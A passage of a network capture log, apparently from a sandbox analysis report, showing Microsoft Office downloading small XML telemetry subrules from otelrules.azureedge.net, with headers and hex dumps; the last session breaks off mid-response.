                                                                                                                                                                                          2024-11-23 16:44:42 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          50192.168.2.54976013.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:44 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:44 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 425
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                          ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                          x-ms-request-id: 00deeadb-901e-007b-4a91-3bac50000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164444Z-15b8b599d882hxlwhC1TEBfa5w000000032000000000czxq
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:44 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          51192.168.2.54976113.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:44 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:44 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 475
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                          x-ms-request-id: 1c81f4ad-001e-005a-6fbf-3bc3d0000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164444Z-174c587ffdf8lw6dhC1TEBkgs800000003700000000090hn
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:44 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          52192.168.2.54976313.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:44 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:44 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 448
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                          x-ms-request-id: 008bef3b-f01e-001f-677c-3b5dc8000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164444Z-174c587ffdf7t49mhC1TEB4qbg0000000370000000001cku
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:45 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          53192.168.2.54976913.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:44 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:44 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 491
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                          ETag: "0x8DC582B98B88612"
                                                                                                                                                                                          x-ms-request-id: af6ae163-c01e-0082-6735-3caf72000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164444Z-178bfbc474btrnf9hC1NYCb80g00000004ug00000000ek9p
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:45 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          54192.168.2.54976813.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:44 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:45 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 416
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                          ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                          x-ms-request-id: 9177d9ad-001e-0028-350e-3dc49f000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164445Z-178bfbc474b9xljthC1NYCtw9400000004r0000000003kc0
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:45 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          55192.168.2.54977413.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:46 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:47 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 415
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                          ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                          x-ms-request-id: 12647bc5-a01e-0070-6743-3d573b000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164447Z-178bfbc474bw8bwphC1NYC38b400000004gg00000000e821
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:47 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          56192.168.2.54977313.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:46 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:47 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 479
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                          ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                          x-ms-request-id: 79b51860-701e-0021-623a-3c3d45000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164447Z-174c587ffdf8lw6dhC1TEBkgs8000000038g000000003xnf
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:47 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          57192.168.2.54977613.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:46 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:47 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 471
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                          ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                          x-ms-request-id: 79a9dcb6-201e-003c-1c7b-3b30f9000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164447Z-178bfbc474bh5zbqhC1NYCkdug00000004rg000000002ygg
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:47 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          58192.168.2.54977713.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:46 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:47 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                          ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                          x-ms-request-id: 7511da03-801e-0083-3b8c-3af0ae000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164447Z-15b8b599d88wn9hhhC1TEBry0g000000037000000000dn67
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:47 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          59192.168.2.54977813.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:47 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:47 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:47 GMT
                                                                                                                                                                                          Content-Type: text/xml
